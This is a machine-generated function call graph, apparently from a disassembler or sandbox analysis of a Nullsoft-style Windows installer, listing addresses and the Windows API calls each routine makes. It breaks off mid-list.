ReadFile 4564->4565 4565->4561 4565->4563 4565->4564 4566 402dd8 4567 402ddf 4566->4567 4568 4030e3 4566->4568 4569 402de5 FindClose 4567->4569 4569->4568 4570 401d5c 4571 40145c 18 API calls 4570->4571 4572 401d63 4571->4572 4573 40145c 18 API calls 4572->4573 4574 401d6c 4573->4574 4575 401d73 lstrcmpiW 4574->4575 4576 401d86 lstrcmpW 4574->4576 4577 401d79 4575->4577 4576->4577 4578 401c99 4576->4578 4577->4576 4577->4578 4280 407c5f 4281 407344 4280->4281 4282 4073c2 GlobalFree 4281->4282 4283 4073cb GlobalAlloc 4281->4283 4284 407c6d 4281->4284 4285 407443 GlobalAlloc 4281->4285 4286 40743a GlobalFree 4281->4286 4282->4283 4283->4281 4283->4284 4285->4281 4285->4284 4286->4285 4579 404363 4580 404373 4579->4580 4581 40439c 4579->4581 4583 403d3f 19 API calls 4580->4583 4582 403dca 8 API calls 4581->4582 4584 4043a8 4582->4584 4585 404380 SetDlgItemTextW 4583->4585 4585->4581 4586 4027e3 4587 4027e9 4586->4587 4588 4027f2 4587->4588 4589 402836 4587->4589 4602 401553 4588->4602 4590 40145c 18 API calls 4589->4590 4592 40283d 4590->4592 4594 4062a3 11 API calls 4592->4594 4593 4027f9 4595 40145c 18 API calls 4593->4595 4600 401a13 4593->4600 4596 40284d 4594->4596 4597 40280a RegDeleteValueW 4595->4597 4606 40149d RegOpenKeyExW 4596->4606 4598 4062a3 11 API calls 4597->4598 4601 40282a RegCloseKey 4598->4601 4601->4600 4603 401563 4602->4603 4604 40145c 18 API calls 4603->4604 4605 401589 RegOpenKeyExW 4604->4605 4605->4593 4612 401515 4606->4612 4614 4014c9 4606->4614 4607 4014ef RegEnumKeyW 4608 401501 RegCloseKey 4607->4608 4607->4614 4609 4062fc 3 API calls 4608->4609 4611 401511 4609->4611 4610 401526 RegCloseKey 4610->4612 4611->4612 4615 401541 RegDeleteKeyW 4611->4615 4612->4600 4613 40149d 3 API calls 4613->4614 4614->4607 4614->4608 4614->4610 4614->4613 4615->4612 4616 403f64 4617 403f90 4616->4617 4618 403f74 4616->4618 4620 403fc3 4617->4620 4621 403f96 SHGetPathFromIDListW 4617->4621 4627 405c84 GetDlgItemTextW 4618->4627 4623 403fad SendMessageW 4621->4623 4624 403fa6 4621->4624 4622 403f81 SendMessageW 4622->4617 4623->4620 4625 40141d 80 API calls 4624->4625 4625->4623 4627->4622 4628 402ae4 4629 402aeb 4628->4629 4630 4030e3 4628->4630 4631 402af2 CloseHandle 4629->4631 4631->4630 4632 402065 4633 401446 18 API calls 4632->4633 4634 40206d 4633->4634 4635 401446 18 API calls 4634->4635 4636 402076 GetDlgItem 4635->4636 4637 4030dc 4636->4637 4638 4030e3 4637->4638 4640 405f51 wsprintfW 4637->4640 4640->4638 4641 402665 4642 40145c 18 API calls 4641->4642 4643 40266b 4642->4643 4644 40145c 18 API calls 4643->4644 4645 402674 4644->4645 4646 40145c 18 API calls 4645->4646 4647 40267d 4646->4647 4648 4062a3 11 API calls 4647->4648 4649 40268c 4648->4649 4650 4062d5 2 API calls 4649->4650 4651 402695 4650->4651 4652 4026a6 lstrlenW lstrlenW 4651->4652 4653 404f72 25 API calls 4651->4653 4656 4030e3 4651->4656 4654 404f72 25 API calls 4652->4654 4653->4651 4655 4026e8 SHFileOperationW 4654->4655 4655->4651 4655->4656 4664 401c69 4665 40145c 18 API calls 4664->4665 4666 401c70 4665->4666 4667 4062a3 11 API calls 4666->4667 4668 401c80 4667->4668 4669 405ca0 MessageBoxIndirectW 4668->4669 4670 401a13 4669->4670 4678 402f6e 4679 402f72 4678->4679 4680 402fae 4678->4680 4681 4062a3 11 API calls 4679->4681 4682 40145c 18 API calls 4680->4682 4683 402f7d 4681->4683 4688 402f9d 4682->4688 4684 4062a3 11 API calls 4683->4684 4685 402f90 4684->4685 4686 402fa2 4685->4686 4687 402f98 4685->4687 4690 4060e7 9 API calls 4686->4690 4689 403e74 5 API calls 4687->4689 4689->4688 4690->4688 4691 4023f0 4692 402403 4691->4692 4693 4024da 4691->4693 4694 40145c 18 API calls 4692->4694 4695 404f72 25 API calls 4693->4695 4696 40240a 4694->4696 4701 4024f1 4695->4701 4697 40145c 18 API calls 4696->4697 4698 402413 4697->4698 4699 402429 LoadLibraryExW 4698->4699 4700 40241b GetModuleHandleW 4698->4700 4702 40243e 4699->4702 4703 4024ce 4699->4703 4700->4699 4700->4702 4715 406365 GlobalAlloc WideCharToMultiByte 4702->4715 4704 404f72 25 API calls 4703->4704 4704->4693 4706 402449 4707 40248c 4706->4707 4708 40244f 4706->4708 4709 404f72 25 API calls 4707->4709 4711 401435 25 API calls 4708->4711 4713 40245f 4708->4713 4710 402496 4709->4710 4712 4062a3 11 API calls 4710->4712 4711->4713 4712->4713 4713->4701 4714 4024c0 FreeLibrary 4713->4714 4714->4701 4716 406390 GetProcAddress 4715->4716 4717 40639d GlobalFree 4715->4717 4716->4717 4717->4706 4718 402df3 4719 402dfa 4718->4719 4721 4019ec 4718->4721 4720 402e07 FindNextFileW 4719->4720 4720->4721 4722 402e16 4720->4722 4724 406009 lstrcpynW 4722->4724 4724->4721 4077 402175 4078 401446 18 API calls 4077->4078 4079 40217c 4078->4079 4080 401446 18 API calls 4079->4080 4081 402186 4080->4081 4082 4062a3 11 API calls 4081->4082 4086 402197 4081->4086 4082->4086 4083 4021aa EnableWindow 4085 4030e3 4083->4085 4084 40219f ShowWindow 4084->4085 4086->4083 4086->4084 4732 404077 4733 404081 4732->4733 4734 404084 lstrcpynW lstrlenW 4732->4734 4733->4734 4103 405479 4104 405491 4103->4104 4105 4055cd 4103->4105 4104->4105 4106 40549d 4104->4106 4107 40561e 4105->4107 4108 4055de GetDlgItem GetDlgItem 4105->4108 4109 4054a8 SetWindowPos 4106->4109 4110 4054bb 4106->4110 4112 405678 4107->4112 4120 40139d 80 API calls 4107->4120 4111 403d3f 19 API calls 4108->4111 4109->4110 4114 4054c0 ShowWindow 4110->4114 4115 4054d8 4110->4115 4116 405608 SetClassLongW 4111->4116 4113 403daf SendMessageW 4112->4113 4133 4055c8 4112->4133 4143 40568a 4113->4143 4114->4115 4117 4054e0 DestroyWindow 4115->4117 4118 4054fa 4115->4118 4119 40141d 80 API calls 4116->4119 4172 4058dc 4117->4172 4121 405510 4118->4121 4122 4054ff SetWindowLongW 4118->4122 4119->4107 4123 405650 4120->4123 4126 4055b9 4121->4126 4127 40551c GetDlgItem 4121->4127 4122->4133 4123->4112 4128 405654 SendMessageW 4123->4128 4124 40141d 80 API calls 4124->4143 4125 4058de DestroyWindow KiUserCallbackDispatcher 4125->4172 4182 403dca 4126->4182 4131 40554c 4127->4131 4132 40552f SendMessageW IsWindowEnabled 4127->4132 4128->4133 4130 40590d ShowWindow 4130->4133 4135 405559 4131->4135 4136 4055a0 SendMessageW 4131->4136 4137 40556c 4131->4137 4146 405551 4131->4146 4132->4131 4132->4133 4134 406805 18 API calls 4134->4143 4135->4136 4135->4146 4136->4126 4140 405574 4137->4140 4141 405589 4137->4141 4139 403d3f 19 API calls 4139->4143 4144 40141d 80 API calls 4140->4144 4145 40141d 80 API calls 4141->4145 4142 405587 4142->4126 4143->4124 4143->4125 4143->4133 4143->4134 4143->4139 4163 40581e DestroyWindow 4143->4163 4173 403d3f 4143->4173 4144->4146 4147 405590 4145->4147 4179 403d18 4146->4179 4147->4126 4147->4146 4149 405705 GetDlgItem 4150 405723 ShowWindow KiUserCallbackDispatcher 4149->4150 4151 40571a 4149->4151 4176 403d85 KiUserCallbackDispatcher 4150->4176 4151->4150 4153 40574d EnableWindow 4156 405761 4153->4156 4154 405766 GetSystemMenu EnableMenuItem SendMessageW 4155 405796 SendMessageW 4154->4155 4154->4156 4155->4156 4156->4154 4177 403d98 SendMessageW 4156->4177 4178 406009 lstrcpynW 4156->4178 4159 4057c4 lstrlenW 4160 406805 18 API calls 4159->4160 4161 4057da SetWindowTextW 4160->4161 4162 40139d 80 API calls 4161->4162 4162->4143 4164 405838 CreateDialogParamW 4163->4164 4163->4172 4165 40586b 4164->4165 4164->4172 4166 403d3f 19 API calls 4165->4166 4167 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4166->4167 4168 40139d 80 API calls 4167->4168 4169 4058bc 4168->4169 4169->4133 4170 4058c4 ShowWindow 4169->4170 4171 403daf SendMessageW 4170->4171 4171->4172 4172->4130 4172->4133 4174 406805 18 API calls 4173->4174 4175 403d4a SetDlgItemTextW 4174->4175 4175->4149 4176->4153 4177->4156 4178->4159 4180 403d25 SendMessageW 4179->4180 4181 403d1f 4179->4181 4180->4142 4181->4180 4183 403ddf GetWindowLongW 4182->4183 4193 403e68 4182->4193 4184 403df0 4183->4184 4183->4193 4185 403e02 4184->4185 4186 403dff GetSysColor 4184->4186 4187 403e12 SetBkMode 4185->4187 4188 403e08 SetTextColor 4185->4188 4186->4185 4189 403e30 4187->4189 4190 403e2a GetSysColor 4187->4190 4188->4187 4191 403e41 4189->4191 4192 403e37 SetBkColor 4189->4192 4190->4189 4191->4193 4194 403e54 DeleteObject 4191->4194 4195 403e5b CreateBrushIndirect 4191->4195 4192->4191 4193->4133 4194->4195 4195->4193 4735 4020f9 GetDC GetDeviceCaps 4736 401446 18 API calls 4735->4736 4737 402116 MulDiv 4736->4737 4738 401446 18 API calls 4737->4738 4739 40212c 4738->4739 4740 406805 18 API calls 4739->4740 4741 402165 CreateFontIndirectW 4740->4741 4742 4030dc 4741->4742 4743 4030e3 4742->4743 4745 405f51 wsprintfW 4742->4745 4745->4743 4746 4024fb 4747 40145c 18 API calls 4746->4747 4748 402502 4747->4748 4749 40145c 18 API calls 4748->4749 4750 40250c 4749->4750 4751 40145c 18 API calls 4750->4751 4752 402515 4751->4752 4753 40145c 18 API calls 4752->4753 4754 40251f 4753->4754 4755 40145c 18 API calls 4754->4755 4756 402529 4755->4756 4757 40253d 4756->4757 4758 40145c 18 API calls 4756->4758 4759 4062a3 11 API calls 4757->4759 4758->4757 4760 40256a CoCreateInstance 4759->4760 4761 40258c 4760->4761 4762 40497c GetDlgItem GetDlgItem 4763 4049d2 7 API calls 4762->4763 4768 404bea 4762->4768 4764 404a76 DeleteObject 4763->4764 4765 404a6a SendMessageW 4763->4765 4766 404a81 4764->4766 4765->4764 4769 404ab8 4766->4769 4771 406805 18 API calls 4766->4771 4767 404ccf 4770 404d74 4767->4770 4775 404bdd 4767->4775 4780 404d1e SendMessageW 4767->4780 4768->4767 4778 40484e 5 API calls 4768->4778 4791 404c5a 4768->4791 4774 403d3f 19 API calls 4769->4774 4772 404d89 4770->4772 4773 404d7d SendMessageW 4770->4773 4777 404a9a SendMessageW SendMessageW 4771->4777 4782 404da2 4772->4782 4783 404d9b ImageList_Destroy 4772->4783 4793 404db2 4772->4793 4773->4772 4779 404acc 4774->4779 4781 403dca 8 API calls 4775->4781 4776 404cc1 SendMessageW 4776->4767 4777->4766 4778->4791 4784 403d3f 19 API calls 4779->4784 4780->4775 4786 404d33 SendMessageW 4780->4786 4787 404f6b 4781->4787 4788 404dab GlobalFree 4782->4788 4782->4793 4783->4782 4789 404add 4784->4789 4785 404f1c 4785->4775 4794 404f31 ShowWindow GetDlgItem ShowWindow 4785->4794 4790 404d46 4786->4790 4788->4793 4792 404baa GetWindowLongW SetWindowLongW 4789->4792 4801 404ba4 4789->4801 4804 404b39 SendMessageW 4789->4804 4805 404b67 SendMessageW 4789->4805 4806 404b7b SendMessageW 4789->4806 4800 404d57 SendMessageW 4790->4800 4791->4767 4791->4776 4795 404bc4 4792->4795 4793->4785 4796 404de4 4793->4796 4799 40141d 80 API calls 4793->4799 4794->4775 4797 404be2 4795->4797 4798 404bca ShowWindow 4795->4798 4809 404e12 SendMessageW 4796->4809 4812 404e28 4796->4812 4814 403d98 SendMessageW 4797->4814 4813 403d98 SendMessageW 4798->4813 4799->4796 4800->4770 4801->4792 4801->4795 4804->4789 4805->4789 4806->4789 4807 404ef3 InvalidateRect 4807->4785 4808 404f09 4807->4808 4815 4043ad 4808->4815 4809->4812 4811 404ea1 SendMessageW SendMessageW 4811->4812 4812->4807 4812->4811 4813->4775 4814->4768 4816 4043cd 4815->4816 4817 406805 18 API calls 4816->4817 4818 40440d 4817->4818 4819 406805 18 API calls 4818->4819 4820 404418 4819->4820 4821 406805 18 API calls 4820->4821 4822 404428 lstrlenW wsprintfW SetDlgItemTextW 4821->4822 4822->4785 4823 4026fc 4824 401ee4 4823->4824 4826 402708 4823->4826 4824->4823 4825 406805 18 API calls 4824->4825 4825->4824 4275 4019fd 4276 40145c 18 API calls 4275->4276 4277 401a04 4276->4277 4278 405e7f 2 API calls 4277->4278 4279 401a0b 4278->4279 4827 4022fd 4828 40145c 18 API calls 4827->4828 4829 402304 GetFileVersionInfoSizeW 4828->4829 4830 40232b GlobalAlloc 4829->4830 4834 4030e3 4829->4834 4831 40233f GetFileVersionInfoW 4830->4831 4830->4834 4832 402350 VerQueryValueW 4831->4832 4833 402381 GlobalFree 4831->4833 4832->4833 4836 402369 4832->4836 4833->4834 4840 405f51 wsprintfW 4836->4840 4838 402375 4841 405f51 wsprintfW 4838->4841 4840->4838 4841->4833 4842 402afd 4843 40145c 18 API calls 4842->4843 4844 402b04 4843->4844 4849 405e50 GetFileAttributesW CreateFileW 4844->4849 4846 402b10 4847 4030e3 4846->4847 4850 405f51 wsprintfW 4846->4850 4849->4846 4850->4847 4851 4029ff 4852 401553 19 API calls 4851->4852 4853 402a09 4852->4853 4854 40145c 18 API calls 4853->4854 4855 402a12 4854->4855 4856 402a1f RegQueryValueExW 4855->4856 4858 401a13 4855->4858 4857 402a3f 4856->4857 4861 402a45 4856->4861 4857->4861 4862 405f51 wsprintfW 4857->4862 4860 4029e4 RegCloseKey 4860->4858 4861->4858 4861->4860 4862->4861 4863 401000 4864 401037 BeginPaint GetClientRect 4863->4864 4865 40100c DefWindowProcW 4863->4865 4867 4010fc 4864->4867 4868 401182 4865->4868 4869 401073 CreateBrushIndirect FillRect DeleteObject 4867->4869 4870 401105 4867->4870 4869->4867 4871 401170 EndPaint 4870->4871 4872 40110b CreateFontIndirectW 4870->4872 4871->4868 4872->4871 4873 40111b 6 API calls 4872->4873 4873->4871 4874 401f80 4875 401446 18 API calls 4874->4875 4876 401f88 4875->4876 4877 401446 18 API calls 4876->4877 4878 401f93 4877->4878 4879 401fa3 4878->4879 4880 40145c 18 API calls 4878->4880 4881 401fb3 4879->4881 4882 40145c 18 API calls 4879->4882 4880->4879 4883 402006 4881->4883 4884 401fbc 4881->4884 4882->4881 4886 40145c 18 API calls 4883->4886 4885 401446 18 API calls 4884->4885 4888 401fc4 4885->4888 4887 40200d 4886->4887 4889 40145c 18 API calls 4887->4889 4890 401446 18 API calls 4888->4890 4891 402016 FindWindowExW 4889->4891 4892 401fce 4890->4892 4896 402036 4891->4896 4893 401ff6 SendMessageW 4892->4893 4894 401fd8 SendMessageTimeoutW 4892->4894 4893->4896 4894->4896 4895 4030e3 4896->4895 4898 405f51 wsprintfW 4896->4898 4898->4895 4899 402880 4900 402884 4899->4900 4901 40145c 18 API calls 4900->4901 4902 4028a7 4901->4902 4903 40145c 18 API calls 4902->4903 4904 4028b1 4903->4904 4905 4028ba RegCreateKeyExW 4904->4905 4906 4028e8 4905->4906 4913 4029ef 4905->4913 4907 402934 4906->4907 4908 40145c 18 API calls 4906->4908 4909 402963 4907->4909 4912 401446 18 API calls 4907->4912 4911 4028fc lstrlenW 4908->4911 4910 4029ae RegSetValueExW 4909->4910 4914 40337f 37 API calls 4909->4914 4917 4029c6 RegCloseKey 4910->4917 4918 4029cb 4910->4918 4915 402918 4911->4915 4916 40292a 4911->4916 4919 402947 4912->4919 4920 40297b 4914->4920 4921 4062a3 11 API calls 4915->4921 4922 4062a3 11 API calls 4916->4922 4917->4913 4923 4062a3 11 API calls 4918->4923 4924 4062a3 11 API calls 4919->4924 4930 406224 4920->4930 4926 402922 4921->4926 4922->4907 4923->4917 4924->4909 4926->4910 4929 4062a3 11 API calls 4929->4926 4931 406247 4930->4931 4932 40628a 4931->4932 4933 40625c wsprintfW 4931->4933 4934 402991 4932->4934 4935 406293 lstrcatW 4932->4935 4933->4932 4933->4933 4934->4929 4935->4934 4936 402082 4937 401446 18 API calls 4936->4937 4938 402093 SetWindowLongW 4937->4938 4939 4030e3 4938->4939 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3710 40141d 3520->3710 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3702 406c68 3529->3702 3707 405c3f CreateProcessW 3529->3707 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3713 406038 3546->3713 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3722 406722 lstrlenW CharPrevW 3549->3722 3729 405e50 GetFileAttributesW CreateFileW 3554->3729 3556 4035c7 3577 4035d7 3556->3577 3730 406009 lstrcpynW 3556->3730 3558 4035ed 3731 406751 lstrlenW 3558->3731 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3738 4032d2 3563->3738 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3772 403368 SetFilePointer 3565->3772 3749 403368 SetFilePointer 3567->3749 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3750 40337f 3571->3750 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3736 403336 ReadFile 3576->3736 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3813 405f51 wsprintfW 3585->3813 3814 405ed3 RegOpenKeyExW 3586->3814 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3796 403e95 3592->3796 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3820 403e74 3602->3820 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3819 406009 lstrcpynW 3620->3819 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3805 405047 OleInitialize 3626->3805 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3965 403c83 3640->3965 3641->3640 3647 405cb5 3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4022 406009 lstrcpynW 3651->4022 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4023 405e50 GetFileAttributesW CreateFileW 3674->4023 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3696 406812 3683->3696 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4026 406009 lstrcpynW 3684->4026 3685->3527 3685->3529 3687 4068d3 GetVersion 3699 4068e0 3687->3699 3688 406a46 lstrlenW 3688->3696 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3699 3693 406952 GetSystemDirectoryW 3693->3699 3694 406965 GetWindowsDirectoryW 3694->3699 3695 406038 5 API calls 3695->3696 3696->3684 3696->3687 3696->3688 3696->3689 3696->3695 4024 405f51 wsprintfW 3696->4024 4025 406009 lstrcpynW 3696->4025 3697 406805 10 API calls 3697->3699 3698 4069df lstrcatW 3698->3696 3699->3692 3699->3693 3699->3694 3699->3696 3699->3697 3699->3698 3700 406999 SHGetSpecialFolderLocation 3699->3700 3700->3699 3701 4069b1 SHGetPathFromIDListW CoTaskMemFree 3700->3701 3701->3699 3703 4062fc 3 API calls 3702->3703 3704 406c6f 3703->3704 3706 406c90 3704->3706 4027 406a99 lstrcpyW 3704->4027 3706->3529 3708 405c7a 3707->3708 3709 405c6e CloseHandle 3707->3709 3708->3529 3709->3708 3711 40139d 80 API calls 3710->3711 3712 401432 3711->3712 3712->3495 3719 406045 3713->3719 3714 4060bb 3715 4060c1 CharPrevW 3714->3715 3717 4060e1 3714->3717 3715->3714 3716 4060ae CharNextW 3716->3714 3716->3719 3717->3549 3718 405d06 CharNextW 3718->3719 3719->3714 3719->3716 3719->3718 3720 40609a CharNextW 3719->3720 3721 4060a9 CharNextW 3719->3721 3720->3719 3721->3716 3723 4037ea CreateDirectoryW 3722->3723 3724 40673f lstrcatW 3722->3724 3725 405e7f 3723->3725 3724->3723 3726 405e8c GetTickCount GetTempFileNameW 3725->3726 3727 405ec2 3726->3727 3728 4037fe 3726->3728 3727->3726 3727->3728 3728->3475 3729->3556 3730->3558 3732 406760 3731->3732 3733 4035f3 3732->3733 3734 406766 CharPrevW 3732->3734 3735 406009 lstrcpynW 3733->3735 3734->3732 3734->3733 3735->3562 3737 403357 3736->3737 3737->3576 3739 4032f3 3738->3739 3740 4032db 3738->3740 3743 403303 GetTickCount 3739->3743 3744 4032fb 3739->3744 3741 4032e4 DestroyWindow 3740->3741 3742 4032eb 3740->3742 3741->3742 3742->3565 3746 403311 CreateDialogParamW ShowWindow 3743->3746 3747 403334 3743->3747 3773 406332 3744->3773 3746->3747 3747->3565 3749->3571 3752 403398 3750->3752 3751 4033c3 3754 403336 ReadFile 3751->3754 3752->3751 3795 403368 SetFilePointer 3752->3795 3755 4033ce 3754->3755 3756 4033e7 GetTickCount 3755->3756 3757 403518 3755->3757 3759 4033d2 3755->3759 3769 4033fa 3756->3769 3758 40351c 3757->3758 3763 403540 3757->3763 3760 403336 ReadFile 3758->3760 3759->3580 3760->3759 3761 403336 ReadFile 3761->3763 3762 403336 ReadFile 3762->3769 3763->3759 3763->3761 3764 40355f WriteFile 3763->3764 3764->3759 3765 403574 3764->3765 3765->3759 3765->3763 3767 40345c GetTickCount 3767->3769 3768 403485 MulDiv wsprintfW 3784 404f72 3768->3784 3769->3759 3769->3762 3769->3767 3769->3768 3771 4034c9 WriteFile 3769->3771 3777 407312 3769->3777 3771->3759 3771->3769 3772->3572 3774 40634f PeekMessageW 3773->3774 3775 406345 DispatchMessageW 3774->3775 3776 403301 3774->3776 3775->3774 3776->3565 3778 407332 3777->3778 3779 40733a 3777->3779 3778->3769 3779->3778 3780 4073c2 GlobalFree 3779->3780 3781 4073cb GlobalAlloc 3779->3781 3782 407443 GlobalAlloc 3779->3782 3783 40743a GlobalFree 3779->3783 3780->3781 3781->3778 3781->3779 3782->3778 3782->3779 3783->3782 3785 404f8b 3784->3785 3794 40502f 3784->3794 3786 404fa9 lstrlenW 3785->3786 3787 406805 18 API calls 3785->3787 3788 404fd2 3786->3788 3789 404fb7 lstrlenW 3786->3789 3787->3786 3791 404fe5 3788->3791 3792 404fd8 SetWindowTextW 3788->3792 3790 404fc9 lstrcatW 3789->3790 3789->3794 3790->3788 3793 404feb SendMessageW SendMessageW SendMessageW 3791->3793 3791->3794 3792->3791 3793->3794 3794->3769 3795->3751 3797 403ea9 3796->3797 3825 405f51 wsprintfW 3797->3825 3799 403f1d 3800 406805 18 API calls 3799->3800 3801 403f29 SetWindowTextW 3800->3801 3803 403f44 3801->3803 3802 403f5f 3802->3595 3803->3802 3804 406805 18 API calls 3803->3804 3804->3803 3826 403daf 3805->3826 3807 40506a 3810 4062a3 11 API calls 3807->3810 3812 405095 3807->3812 3829 40139d 3807->3829 3808 403daf SendMessageW 3809 4050a5 OleUninitialize 3808->3809 3809->3632 3810->3807 3812->3808 3813->3592 3815 405f07 RegQueryValueExW 3814->3815 3816 405989 3814->3816 3817 405f29 RegCloseKey 3815->3817 3816->3590 3816->3591 3817->3816 3819->3597 3964 406009 lstrcpynW 3820->3964 3822 403e88 3823 406722 3 API calls 3822->3823 3824 403e8e lstrcatW 3823->3824 3824->3615 3825->3799 3827 403dc7 3826->3827 3828 403db8 SendMessageW 3826->3828 3827->3807 3828->3827 3832 4013a4 3829->3832 3830 401410 3830->3807 3832->3830 3833 4013dd MulDiv SendMessageW 3832->3833 3834 4015a0 3832->3834 3833->3832 3835 4015fa 3834->3835 3914 40160c 3834->3914 3836 401601 3835->3836 3837 401742 3835->3837 3838 401962 3835->3838 3839 4019ca 3835->3839 3840 40176e 3835->3840 3841 401650 3835->3841 3842 4017b1 3835->3842 3843 401672 3835->3843 3844 401693 3835->3844 3845 401616 3835->3845 3846 4016d6 3835->3846 3847 401736 3835->3847 3848 401897 3835->3848 3849 4018db 3835->3849 3850 40163c 3835->3850 3851 4016bd 3835->3851 3835->3914 3864 4062a3 11 API calls 3836->3864 3856 401751 ShowWindow 3837->3856 3857 401758 3837->3857 3861 40145c 18 API calls 3838->3861 3854 40145c 18 API calls 3839->3854 3858 40145c 18 API calls 3840->3858 3881 4062a3 11 API calls 3841->3881 3947 40145c 3842->3947 3859 40145c 18 API calls 3843->3859 3941 401446 3844->3941 3853 40145c 18 API calls 3845->3853 3870 401446 18 API calls 3846->3870 3846->3914 3847->3914 3963 405f51 wsprintfW 3847->3963 3860 40145c 18 API calls 3848->3860 3865 40145c 18 API calls 3849->3865 3855 401647 PostQuitMessage 3850->3855 3850->3914 3852 4062a3 11 API calls 3851->3852 3867 4016c7 SetForegroundWindow 3852->3867 3868 40161c 3853->3868 3869 4019d1 SearchPathW 3854->3869 